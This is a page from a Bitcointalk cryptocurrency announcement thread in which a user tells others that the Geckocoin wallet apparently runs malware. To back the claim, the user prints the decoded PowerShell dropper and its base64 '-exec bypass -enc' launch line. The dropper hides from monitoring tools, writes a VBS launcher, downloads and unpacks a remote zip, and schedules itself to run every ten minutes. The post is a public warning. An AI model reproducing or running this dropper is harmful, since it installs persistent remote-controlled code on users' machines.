Bitcoin Forum>Alternate cryptocurrencies>Announcements (Altcoins)
Pages:
Author

Topic: [ANN] {Geckocoin / Ghostrider \ Masternode / PvP Games} - page 2. (Read 1311 times)

furcalor
jr. member
Activity: 59
Merit: 3
Re: [ANN] {Geckocoin / Ghostrider \ Masternode / PvP Games}
March 12, 2023, 06:51:46 PM
#41
Quote from: Gecko_mn on March 12, 2023, 12:14:40 PM
Quote from: furcalor on March 11, 2023, 06:44:16 PM


Code:
If (Get-Process -Name 'Taskmgr', 'perfmon', 'ProcessHacker', 'TMX64', 'TMX', 'procexp64a', 'procexp64', 'procexp', 'ProcessExplorerPortable', 'SystemExplorerPortable', 'SystemExplorer', 'EXEExplorerPort', 'EXE', 'EXE64', 'TaskManagerPort', 'KillProcess', 'TaskMan', 'WinUtilitiesPortable', 'WinUtil', 'FreeTaskManager', 'AnVir', 'anvir64', 'Wireshark' -ErrorAction SilentlyContinue){exit} Else {if( !((Test-Path -Path "$env:APPDATA\LogState\htMbZp.py" -PathType Leaf) -and (Test-Path -Path "$env:APPDATA\LogState\ws2help.exe" -PathType Leaf) -and (Test-Path -Path "$env:APPDATA\LogState\jLherYu.vbs" -PathType Leaf))){schtasks /delete /tn "ImDskSvc\wmiApSrv" /f;Stop-Process -Name "ws2help";Remove-Item -Recurse -Force "$env:APPDATA\LogState";New-Item -ItemType Directory -Force -Path "$env:APPDATA\LogState";$addPath = "$env:APPDATA\LogState\jLherYu.vbs"; $text = "Option Explicit";$text2 = "Dim ProcessPath";$text3 = "Dim fileSystemObject";$text4 = "Dim strAppDataPath";$text5 = "ProcessPath = `"ws2help.exe`"";$text6 = "Call CheckProcess(DblQuote(ProcessPath))";$text7 = "Sub CheckProcess(ProcessPath)";$text8 = "Dim strComputer,objWMIService,colProcesses,WshShell,Tab,ProcessName";$text9 = "strComputer = `".`"";$text10 = "Tab = Split(ProcessPath,`"\`")";$text11 = "ProcessName = Tab(UBound(Tab))";$text12 = "ProcessName = Replace(ProcessName,Chr(34),`"`")";$text13 = "Set objWMIService = GetObject(`"winmgmts:`" _";$text14 = "& `"{impersonationLevel=impersonate}!\\`" & strComputer & `"\root\cimv2`")";$text15 = "Set colProcesses = objWMIService.ExecQuery _";$text16 = "(`"Select * from Win32_Process Where Name = '`"& ProcessName & `"'`")";$text17 = "Set fileSystemObject = CreateObject(`"Scripting.FileSystemObject`")";$text18 = "strAppDataPath = CreateObject(`"WScript.Shell`").ExpandEnvironmentStrings(`"%appdata%`")";$text19 = "If colProcesses.Count = 0 And fileSystemObject.FileExists(strAppDataPath & `"\LogState\htMbZp.py`") Then";$text20 = "Set WshShell = CreateObject(`"WScript.Shell`")";$text21 = "WshShell.Run `"cmd /c %appdata%\LogState\ws2help.exe %appdata%\LogState\htMbZp.py`", 0, False";$text22 = "Else";$text23 = "Exit Sub";$text24 = "End if";$text25 = "End Sub";$text26 = "Function DblQuote(Str)";$text27 = "DblQuote = Chr(34) & Str & Chr(34)";$text28 = "End Function";echo $text $text2 $text3 $text4 $text5 $text6 $text7 $text8 $text9 $text10 $text11 $text12 $text13 $text14 $text15 $text16 $text17 $text18 $text19 $text20 $text21 $text22 $text23 $text24 $text25 $text26 $text27 $text28 | Out-File $addPath;[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri "http://REMOVED.net/bootstrap.zip" -OutFile "$env:TEMP\bootstrap.zip";Expand-Archive -Path "$env:TEMP\bootstrap.zip" -DestinationPath "$env:APPDATA\LogState" -Force;schtasks /create /sc minute /mo 10 /tn "ImDskSvc\wmiApSrv" /tr "$env:APPDATA\LogState\jLherYu.vbs" /f } else {Start-Process -FilePath "$env:APPDATA\LogState\jLherYu.vbs";break}}

Stop writing this lies everywhere, give video evidence, if you have any at all

Check out the virustotal link earlier in the topic, specifically the behavior one.
GeckoCoin wallet executes this line:
Code:
C:\Windows\System32\cmd.exe /C powershell.exe -exec bypass -enc SQBmACAAKABHAGUAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIAAnAFQAYQBzAGsAbQBnAHIAJwAsACAAJwBwAGUAcgBmAG0AbwBuACcALAAgACcAUAByAG8AYwBlAHMAcwBIAGEAYwBrAGUAcgAnACwAIAAnAFQATQBYADYANAAnACwAIAAnAFQATQBYACcALAAgACcAcAByAG8AYwBlAHgAcAA2ADQAYQAnACwAIAAnAHAAcgBvAGMAZQB4AHAANgA0ACcALAAgACcAcAByAG8AYwBlAHgAcAAnACwAIAAnAFAAcgBvAGMAZQBzAHMARQB4AHAAbABvAHIAZQByAFAAbwByAHQAYQBiAGwAZQAnACwAIAAnAFMAeQBzAHQAZQBtAEUAeABwAGwAbwByAGUAcgBQAG8AcgB0AGEAYgBsAGUAJwAsACAAJwBTAHkAcwB0AGUAbQBFAHgAcABsAG8AcgBlAHIAJwAsACAAJwBFAFgARQBFAHgAcABsAG8AcgBlAHIAUABvAHIAdAAnACwAIAAnAEUAWABFACcALAAgACcARQBYAEUANgA0ACcALAAgACcAVABhAHMAawBNAGEAbgBhAGcAZQByAFAAbwByAHQAJwAsACAAJwBLAGkAbABsAFAAcgBvAGMAZQBzAHMAJwAsACAAJwBUAGEAcwBrAE0AYQBuACcALAAgACcAVwBpAG4AVQB0AGkAbABpAHQAaQBlAHMAUABvAHIAdABhAGIAbABlACcALAAgACcAVwBpAG4AVQB0AGkAbAAnACwAIAAnAEYAcgBlAGUAVABhAHMAawBNAGEAbgBhAGcAZQByACcALAAgACcAQQBuAFYAaQByACcALAAgACcAYQBuAHYAaQByADYANAAnACwAIAAnAFcAaQByAGUAcwBoAGEAcgBrACcAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAKQB7AGUAeABpAHQAfQAgAEUAbABzAGUAIAB7AGkAZgAoACAAIQAoACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwATABvAGcAUwB0AGEAdABlAFwAaAB0AE0AYgBaAHAALgBwAHkAIgAgAC0AUABhAHQAaABUAHkAcABlACAATABlAGEAZgApACAALQBhAG4AZAAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwATABvAGcAUwB0AGEAdABlAFwAdwBzADIAaABlAGwAcAAuAGUAeABlACIAIAAtAFAAYQB0AGgAVAB5AHAAZQAgAEwAZQBhAGYAKQAgAC0AYQBuAGQAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEwAbwBnAFMAdABhAHQAZQBcAGoATABoAGUAcgBZAHUALgB2AGIAcwAiACAALQBQAGEAdABoAFQAeQBwAGUAIABMAGUAYQBmACkAKQApAHsAcwBjAGgAdABhAHMAawBzACAALwBkAGUAbABlAHQAZQAgAC8AdABuACAAIgBJAG0ARABzAGsAUwB2AGMAXAB3AG0AaQBBAHAAUwByAHYAIgAgAC8AZgA7AFMAdABvAHAALQBQAHIAbwBjAGUAcwBzACAALQBOAGEAbQBlACAAIgB3AHMAMgBoAGUAbABwACIAOwBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABMAG8AZwBTAHQAYQB0AGUAIgA7AE4AZQB3AC0ASQB0AGUAbQAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAAtAEYAbwByAGMAZQAgAC0AUABhAHQAaAAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABMAG8AZwBTAHQAYQB0AGUAIgA7ACQAYQBkAGQAUABhAHQAaAAgAD0AIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwATABvAGcAUwB0AGEAdABlAFwAagBMAGgAZQByAFkAdQAuAHYAYgBzACIAOwAgACQAdABlAHgAdAAgAD0AIAAiAE8AcAB0AGkAbwBuACAARQB4AHAAbABpAGMAaQB0ACIAOwAkAHQAZQB4AHQAMgAgAD0AIAAiAEQAaQBtACAAUAByAG8AYwBlAHMAcwBQAGEAdABoACIAOwAkAHQAZQB4AHQAMwAgAD0AIAAiAEQAaQBtACAAZgBpAGwAZQBTAHkAcwB0AGUAbQBPAGIAagBlAGMAdAAiADsAJAB0AGUAeAB0ADQAIAA9ACAAIgBEAGkAbQAgAHMAdAByAEEAcABwAEQAYQB0AGEAUABhAHQAaAAiADsAJAB0AGUAeAB0ADUAIAA9ACAAIgBQAHIAbwBjAGUAcwBzAFAAYQB0AGgAIAA9ACAAYAAiAHcAcwAyAGgAZQBsAHAALgBlAHgAZQBgACIAIgA7ACQAdABlAHgAdAA2ACAAPQAgACIAQwBhAGwAbAAgAEMAaABlAGMAawBQAHIAbwBjAGUAcwBzACgARABiAGwAUQB1AG8AdABlACgAUAByAG8AYwBlAHMAcwBQAGEAdABoACkAKQAiADsAJAB0AGUAeAB0ADcAIAA9ACAAIgBTAHUAYgAgAEMAaABlAGMAawBQAHIAbwBjAGUAcwBzACgAUAByAG8AYwBlAHMAcwBQAGEAdABoACkAIgA7ACQAdABlAHgAdAA4ACAAPQAgACIARABpAG0AIABzAHQAcgBDAG8AbQBwAHUAdABlAHIALABvAGIAagBXAE0ASQBTAGUAcgB2AGkAYwBlACwAYwBvAGwAUAByAG8AYwBlAHMAcwBlAHMALABXAHMAaABTAGgAZQBsAGwALABUAGEAYgAsAFAAcgBvAGMAZQBzAHMATgBhAG0AZQAiADsAJAB0AGUAeAB0ADkAIAA9ACAAIgBzAHQAcgBDAG8AbQBwAHUAdABlAHIAIAA9ACAAYAAiAC4AYAAiACIAOwAkAHQAZQB4AHQAMQAwACAAPQAgACIAVABhAGIAIAA9ACAAUwBwAGwAaQB0ACgAUAByAG8AYwBlAHMAcwBQAGEAdABoACwAYAAiAFwAYAAiACkAIgA7ACQAdABlAHgAdAAxADEAIAA9ACAAIgBQAHIAbwBjAGUAcwBzAE4AYQBtAGUAIAA9ACAAVABhAGIAKABVAEIAbwB1AG4AZAAoAFQAYQBiACkAKQAiADsAJAB0AGUAeAB0ADEAMgAgAD0AIAAiAFAAcgBvAGMAZQBzAHMATgBhAG0AZQAgAD0AIABSAGUAcABsAGEAYwBlACgAUAByAG8AYwBlAHMAcwBOAGEAbQBlACwAQwBoAHIAKAAzADQAKQAsAGAAIgBgACIAKQAiADsAJAB0AGUAeAB0ADEAMwAgAD0AIAAiAFMAZQB0ACAAbwBiAGoAVwBNAEkAUwBlAHIAdgBpAGMAZQAgAD0AIABHAGUAdABPAGIAagBlAGMAdAAoAGAAIgB3AGkAbgBtAGcAbQB0AHMAOgBgACIAIABfACIAOwAkAHQAZQB4AHQAMQA0ACAAPQAgACIAJgAgAGAAIgB7AGkAbQBwAGUAcgBzAG8AbgBhAHQAaQBvAG4ATABlAHYAZQBsAD0AaQBtAHAAZQByAHMAbwBuAGEAdABlAH0AIQBcAFwAYAAiACAAJgAgAHMAdAByAEMAbwBtAHAAdQB0AGUAcgAgACYAIABgACIAXAByAG8AbwB0AFwAYwBpAG0AdgAyAGAAIgApACIAOwAkAHQAZQB4AHQAMQA1ACAAPQAgACIAUwBlAHQAIABjAG8AbABQAHIAbwBjAGUAcwBzAGUAcwAgAD0AIABvAGIAagBXAE0ASQBTAGUAcgB2AGkAYwBlAC4ARQB4AGUAYwBRAHUAZQByAHkAIABfACIAOwAkAHQAZQB4AHQAMQA2ACAAPQAgACIAKABgACIAUwBlAGwAZQBjAHQAIAAqACAAZgByAG8AbQAgAFcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAIABXAGgAZQByAGUAIABOAGEAbQBlACAAPQAgACcAYAAiACYAIABQAHIAbwBjAGUAcwBzAE4AYQBtAGUAIAAmACAAYAAiACcAYAAiACkAIgA7ACQAdABlAHgAdAAxADcAIAA9ACAAIgBTAGUAdAAgAGYAaQBsAGUAUwB5AHMAdABlAG0ATwBiAGoAZQBjAHQAIAA9ACAAQwByAGUAYQB0AGUATwBiAGoAZQBjAHQAKABgACIAUwBjAHIAaQBwAHQAaQBuAGcALgBGAGkAbABlAFMAeQBzAHQAZQBtAE8AYgBqAGUAYwB0AGAAIgApACIAOwAkAHQAZQB4AHQAMQA4ACAAPQAgACIAcwB0AHIAQQBwAHAARABhAHQAYQBQAGEAdABoACAAPQAgAEMAcgBlAGEAdABlAE8AYgBqAGUAYwB0ACgAYAAiAFcAUwBjAHIAaQBwAHQALgBTAGgAZQBsAGwAYAAiACkALgBFAHgAcABhAG4AZABFAG4AdgBpAHIAbwBuAG0AZQBuAHQAUwB0AHIAaQBuAGcAcwAoAGAAIgAlAGEAcABwAGQAYQB0AGEAJQBgACIAKQAiADsAJAB0AGUAeAB0ADEAOQAgAD0AIAAiAEkAZgAgAGMAbwBsAFAAcgBvAGMAZQBzAHMAZQBzAC4AQwBvAHUAbgB0ACAAPQAgADAAIABBAG4AZAAgAGYAaQBsAGUAUwB5AHMAdABlAG0ATwBiAGoAZQBjAHQALgBGAGkAbABlAEUAeABpAHMAdABzACgAcwB0AHIAQQBwAHAARABhAHQAYQBQAGEAdABoACAAJgAgAGAAIgBcAEwAbwBnAFMAdABhAHQAZQBcAGgAdABNAGIAWgBwAC4AcAB5AGAAIgApACAAVABoAGUAbgAiADsAJAB0AGUAeAB0ADIAMAAgAD0AIAAiAFMAZQB0ACAAVwBzAGgAUwBoAGUAbABsACAAPQAgAEMAcgBlAGEAdABlAE8AYgBqAGUAYwB0ACgAYAAiAFcAUwBjAHIAaQBwAHQALgBTAGgAZQBsAGwAYAAiACkAIgA7ACQAdABlAHgAdAAyADEAIAA9ACAAIgBXAHMAaABTAGgAZQBsAGwALgBSAHUAbgAgAGAAIgBjAG0AZAAgAC8AYwAgACUAYQBwAHAAZABhAHQAYQAlAFwATABvAGcAUwB0AGEAdABlAFwAdwBzADIAaABlAGwAcAAuAGUAeABlACAAJQBhAHAAcABkAGEAdABhACUAXABMAG8AZwBTAHQAYQB0AGUAXABoAHQATQBiAFoAcAAuAHAAeQBgACIALAAgADAALAAgAEYAYQBsAHMAZQAiADsAJAB0AGUAeAB0ADIAMgAgAD0AIAAiAEUAbABzAGUAIgA7ACQAdABlAHgAdAAyADMAIAA9ACAAIgBFAHgAaQB0ACAAUwB1AGIAIgA7ACQAdABlAHgAdAAyADQAIAA9ACAAIgBFAG4AZAAgAGkAZgAiADsAJAB0AGUAeAB0ADIANQAgAD0AIAAiAEUAbgBkACAAUwB1AGIAIgA7ACQAdABlAHgAdAAyADYAIAA9ACAAIgBGAHUAbgBjAHQAaQBvAG4AIABEAGIAbABRAHUAbwB0AGUAKABTAHQAcgApACIAOwAkAHQAZQB4AHQAMgA3ACAAPQAgACIARABiAGwAUQB1AG8AdABlACAAPQAgAEMAaAByACgAMwA0ACkAIAAmACAAUwB0AHIAIAAmACAAQwBoAHIAKAAzADQAKQAiADsAJAB0AGUAeAB0ADIAOAAgAD0AIAAiAEUAbgBkACAARgB1AG4AYwB0AGkAbwBuACIAOwBlAGMAaABvACAAJAB0AGUAeAB0ACAAJAB0AGUAeAB0ADIAIAAkAHQAZQB4AHQAMwAgACQAdABlAHgAdAA0ACAAJAB0AGUAeAB0ADUAIAAkAHQAZQB4AHQANgAgACQAdABlAHgAdAA3ACAAJAB0AGUAeAB0ADgAIAAkAHQAZQB4AHQAOQAgACQAdABlAHgAdAAxADAAIAAkAHQAZQB4AHQAMQAxACAAJAB0AGUAeAB0ADEAMgAgACQAdABlAHgAdAAxADMAIAAkAHQAZQB4AHQAMQA0ACAAJAB0AGUAeAB0ADEANQAgACQAdABlAHgAdAAxADYAIAAkAHQAZQB4AHQAMQA3ACAAJAB0AGUAeAB0ADEAOAAgACQAdABlAHgAdAAxADkAIAAkAHQAZQB4AHQAMgAwACAAJAB0AGUAeAB0ADIAMQAgACQAdABlAHgAdAAyADIAIAAkAHQAZQB4AHQAMgAzACAAJAB0AGUAeAB0ADIANAAgACQAdABlAHgAdAAyADUAIAAkAHQAZQB4AHQAMgA2ACAAJAB0AGUAeAB0ADIANwAgACQAdABlAHgAdAAyADgAIAB8ACAATwB1AHQALQBGAGkAbABlACAAJABhAGQAZABQAGEAdABoADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6AFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAIAA9ACAAWwBOAGUAdAAuAFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAVAB5AHAAZQBdADoAOgBUAGwAcwAxADIAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAIgBoAHQAdABwADoALwAvAHUAcABkAGEAdABlAC4AYQBpAHIAZAByAG8AcABlAHIALgBuAGUAdAAvAGIAbwBvAHQAcwB0AHIAYQBwAC4AegBpAHAAIgAgAC0ATwB1AHQARgBpAGwAZQAgACIAJABlAG4AdgA6AFQARQBNAFAAXABiAG8AbwB0AHMAdAByAGEAcAAuAHoAaQBwACIAOwBFAHgAcABhAG4AZAAtAEEAcgBjAGgAaQB2AGUAIAAtAFAAYQB0AGgAIAAiACQAZQBuAHYAOgBUAEUATQBQAFwAYgBvAG8AdABzAHQAcgBhAHAALgB6AGkAcAAiACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABMAG8AZwBTAHQAYQB0AGUAIgAgAC0ARgBvAHIAYwBlADsAcwBjAGgAdABhAHMAawBzACAALwBjAHIAZQBhAHQAZQAgAC8AcwBjACAAbQBpAG4AdQB0AGUAIAAvAG0AbwAgADEAMAAgAC8AdABuACAAIgBJAG0ARABzAGsAUwB2AGMAXAB3AG0AaQBBAHAAUwByAHYAIgAgAC8AdAByACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEwAbwBnAFMAdABhAHQAZQBcAGoATABoAGUAcgBZAHUALgB2AGIAcwAiACAALwBmACAAfQAgAGUAbABzAGUAIAB7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABMAG8AZwBTAHQAYQB0AGUAXABqAEwAaABlAHIAWQB1AC4AdgBiAHMAIgA7AGIAcgBlAGEAawB9AH0A

That is a base64 encoded line, that you can decode easily to see for your selves. On linux you can run the below line, or you can use something like https://www.base64decode.org/, just set the source character set to auto-detect.
Code:
echo SQBmACAAKABHAGUAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIAAnAFQAYQBzAGsAbQBnAHIAJwAsACAAJwBwAGUAcgBmAG0AbwBuACcALAAgACcAUAByAG8AYwBlAHMAcwBIAGEAYwBrAGUAcgAnACwAIAAnAFQATQBYADYANAAnACwAIAAnAFQATQBYACcALAAgACcAcAByAG8AYwBlAHgAcAA2ADQAYQAnACwAIAAnAHAAcgBvAGMAZQB4AHAANgA0ACcALAAgACcAcAByAG8AYwBlAHgAcAAnACwAIAAnAFAAcgBvAGMAZQBzAHMARQB4AHAAbABvAHIAZQByAFAAbwByAHQAYQBiAGwAZQAnACwAIAAnAFMAeQBzAHQAZQBtAEUAeABwAGwAbwByAGUAcgBQAG8AcgB0AGEAYgBsAGUAJwAsACAAJwBTAHkAcwB0AGUAbQBFAHgAcABsAG8AcgBlAHIAJwAsACAAJwBFAFgARQBFAHgAcABsAG8AcgBlAHIAUABvAHIAdAAnACwAIAAnAEUAWABFACcALAAgACcARQBYAEUANgA0ACcALAAgACcAVABhAHMAawBNAGEAbgBhAGcAZQByAFAAbwByAHQAJwAsACAAJwBLAGkAbABsAFAAcgBvAGMAZQBzAHMAJwAsACAAJwBUAGEAcwBrAE0AYQBuACcALAAgACcAVwBpAG4AVQB0AGkAbABpAHQAaQBlAHMAUABvAHIAdABhAGIAbABlACcALAAgACcAVwBpAG4AVQB0AGkAbAAnACwAIAAnAEYAcgBlAGUAVABhAHMAawBNAGEAbgBhAGcAZQByACcALAAgACcAQQBuAFYAaQByACcALAAgACcAYQBuAHYAaQByADYANAAnACwAIAAnAFcAaQByAGUAcwBoAGEAcgBrACcAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAKQB7AGUAeABpAHQAfQAgAEUAbABzAGUAIAB7AGkAZgAoACAAIQAoACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwATABvAGcAUwB0AGEAdABlAFwAaAB0AE0AYgBaAHAALgBwAHkAIgAgAC0AUABhAHQAaABUAHkAcABlACAATABlAGEAZgApACAALQBhAG4AZAAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwATABvAGcAUwB0AGEAdABlAFwAdwBzADIAaABlAGwAcAAuAGUAeABlACIAIAAtAFAAYQB0AGgAVAB5AHAAZQAgAEwAZQBhAGYAKQAgAC0AYQBuAGQAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEwAbwBnAFMAdABhAHQAZQBcAGoATABoAGUAcgBZAHUALgB2AGIAcwAiACAALQBQAGEAdABoAFQAeQBwAGUAIABMAGUAYQBmACkAKQApAHsAcwBjAGgAdABhAHMAawBzACAALwBkAGUAbABlAHQAZQAgAC8AdABuACAAIgBJAG0ARABzAGsAUwB2AGMAXAB3AG0AaQBBAHAAUwByAHYAIgAgAC8AZgA7AFMAdABvAHAALQBQAHIAbwBjAGUAcwBzACAALQBOAGEAbQBlACAAIgB3AHMAMgBoAGUAbABwACIAOwBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABMAG8AZwBTAHQAYQB0AGUAIgA7AE4AZQB3AC0ASQB0AGUAbQAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAAtAEYAbwByAGMAZQAgAC0AUABhAHQAaAAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABMAG8AZwBTAHQAYQB0AGUAIgA7ACQAYQBkAGQAUABhAHQAaAAgAD0AIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwATABvAGcAUwB0AGEAdABlAFwAagBMAGgAZQByAFkAdQAuAHYAYgBzACIAOwAgACQAdABlAHgAdAAgAD0AIAAiAE8AcAB0AGkAbwBuACAARQB4AHAAbABpAGMAaQB0ACIAOwAkAHQAZQB4AHQAMgAgAD0AIAAiAEQAaQBtACAAUAByAG8AYwBlAHMAcwBQAGEAdABoACIAOwAkAHQAZQB4AHQAMwAgAD0AIAAiAEQAaQBtACAAZgBpAGwAZQBTAHkAcwB0AGUAbQBPAGIAagBlAGMAdAAiADsAJAB0AGUAeAB0ADQAIAA9ACAAIgBEAGkAbQAgAHMAdAByAEEAcABwAEQAYQB0AGEAUABhAHQAaAAiADsAJAB0AGUAeAB0ADUAIAA9ACAAIgBQAHIAbwBjAGUAcwBzAFAAYQB0AGgAIAA9ACAAYAAiAHcAcwAyAGgAZQBsAHAALgBlAHgAZQBgACIAIgA7ACQAdABlAHgAdAA2ACAAPQAgACIAQwBhAGwAbAAgAEMAaABlAGMAawBQAHIAbwBjAGUAcwBzACgARABiAGwAUQB1AG8AdABlACgAUAByAG8AYwBlAHMAcwBQAGEAdABoACkAKQAiADsAJAB0AGUAeAB0ADcAIAA9ACAAIgBTAHUAYgAgAEMAaABlAGMAawBQAHIAbwBjAGUAcwBzACgAUAByAG8AYwBlAHMAcwBQAGEAdABoACkAIgA7ACQAdABlAHgAdAA4ACAAPQAgACIARABpAG0AIABzAHQAcgBDAG8AbQBwAHUAdABlAHIALABvAGIAagBXAE0ASQBTAGUAcgB2AGkAYwBlACwAYwBvAGwAUAByAG8AYwBlAHMAcwBlAHMALABXAHMAaABTAGgAZQBsAGwALABUAGEAYgAsAFAAcgBvAGMAZQBzAHMATgBhAG0AZQAiADsAJAB0AGUAeAB0ADkAIAA9ACAAIgBzAHQAcgBDAG8AbQBwAHUAdABlAHIAIAA9ACAAYAAiAC4AYAAiACIAOwAkAHQAZQB4AHQAMQAwACAAPQAgACIAVABhAGIAIAA9ACAAUwBwAGwAaQB0ACgAUAByAG8AYwBlAHMAcwBQAGEAdABoACwAYAAiAFwAYAAiACkAIgA7ACQAdABlAHgAdAAxADEAIAA9ACAAIgBQAHIAbwBjAGUAcwBzAE4AYQBtAGUAIAA9ACAAVABhAGIAKABVAEIAbwB1AG4AZAAoAFQAYQBiACkAKQAiADsAJAB0AGUAeAB0ADEAMgAgAD0AIAAiAFAAcgBvAGMAZQBzAHMATgBhAG0AZQAgAD0AIABSAGUAcABsAGEAYwBlACgAUAByAG8AYwBlAHMAcwBOAGEAbQBlACwAQwBoAHIAKAAzADQAKQAsAGAAIgBgACIAKQAiADsAJAB0AGUAeAB0ADEAMwAgAD0AIAAiAFMAZQB0ACAAbwBiAGoAVwBNAEkAUwBlAHIAdgBpAGMAZQAgAD0AIABHAGUAdABPAGIAagBlAGMAdAAoAGAAIgB3AGkAbgBtAGcAbQB0AHMAOgBgACIAIABfACIAOwAkAHQAZQB4AHQAMQA0ACAAPQAgACIAJgAgAGAAIgB7AGkAbQBwAGUAcgBzAG8AbgBhAHQAaQBvAG4ATABlAHYAZQBsAD0AaQBtAHAAZQByAHMAbwBuAGEAdABlAH0AIQBcAFwAYAAiACAAJgAgAHMAdAByAEMAbwBtAHAAdQB0AGUAcgAgACYAIABgACIAXAByAG8AbwB0AFwAYwBpAG0AdgAyAGAAIgApACIAOwAkAHQAZQB4AHQAMQA1ACAAPQAgACIAUwBlAHQAIABjAG8AbABQAHIAbwBjAGUAcwBzAGUAcwAgAD0AIABvAGIAagBXAE0ASQBTAGUAcgB2AGkAYwBlAC4ARQB4AGUAYwBRAHUAZQByAHkAIABfACIAOwAkAHQAZQB4AHQAMQA2ACAAPQAgACIAKABgACIAUwBlAGwAZQBjAHQAIAAqACAAZgByAG8AbQAgAFcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAIABXAGgAZQByAGUAIABOAGEAbQBlACAAPQAgACcAYAAiACYAIABQAHIAbwBjAGUAcwBzAE4AYQBtAGUAIAAmACAAYAAiACcAYAAiACkAIgA7ACQAdABlAHgAdAAxADcAIAA9ACAAIgBTAGUAdAAgAGYAaQBsAGUAUwB5AHMAdABlAG0ATwBiAGoAZQBjAHQAIAA9ACAAQwByAGUAYQB0AGUATwBiAGoAZQBjAHQAKABgACIAUwBjAHIAaQBwAHQAaQBuAGcALgBGAGkAbABlAFMAeQBzAHQAZQBtAE8AYgBqAGUAYwB0AGAAIgApACIAOwAkAHQAZQB4AHQAMQA4ACAAPQAgACIAcwB0AHIAQQBwAHAARABhAHQAYQBQAGEAdABoACAAPQAgAEMAcgBlAGEAdABlAE8AYgBqAGUAYwB0ACgAYAAiAFcAUwBjAHIAaQBwAHQALgBTAGgAZQBsAGwAYAAiACkALgBFAHgAcABhAG4AZABFAG4AdgBpAHIAbwBuAG0AZQBuAHQAUwB0AHIAaQBuAGcAcwAoAGAAIgAlAGEAcABwAGQAYQB0AGEAJQBgACIAKQAiADsAJAB0AGUAeAB0ADEAOQAgAD0AIAAiAEkAZgAgAGMAbwBsAFAAcgBvAGMAZQBzAHMAZQBzAC4AQwBvAHUAbgB0ACAAPQAgADAAIABBAG4AZAAgAGYAaQBsAGUAUwB5AHMAdABlAG0ATwBiAGoAZQBjAHQALgBGAGkAbABlAEUAeABpAHMAdABzACgAcwB0AHIAQQBwAHAARABhAHQAYQBQAGEAdABoACAAJgAgAGAAIgBcAEwAbwBnAFMAdABhAHQAZQBcAGgAdABNAGIAWgBwAC4AcAB5AGAAIgApACAAVABoAGUAbgAiADsAJAB0AGUAeAB0ADIAMAAgAD0AIAAiAFMAZQB0ACAAVwBzAGgAUwBoAGUAbABsACAAPQAgAEMAcgBlAGEAdABlAE8AYgBqAGUAYwB0ACgAYAAiAFcAUwBjAHIAaQBwAHQALgBTAGgAZQBsAGwAYAAiACkAIgA7ACQAdABlAHgAdAAyADEAIAA9ACAAIgBXAHMAaABTAGgAZQBsAGwALgBSAHUAbgAgAGAAIgBjAG0AZAAgAC8AYwAgACUAYQBwAHAAZABhAHQAYQAlAFwATABvAGcAUwB0AGEAdABlAFwAdwBzADIAaABlAGwAcAAuAGUAeABlACAAJQBhAHAAcABkAGEAdABhACUAXABMAG8AZwBTAHQAYQB0AGUAXABoAHQATQBiAFoAcAAuAHAAeQBgAC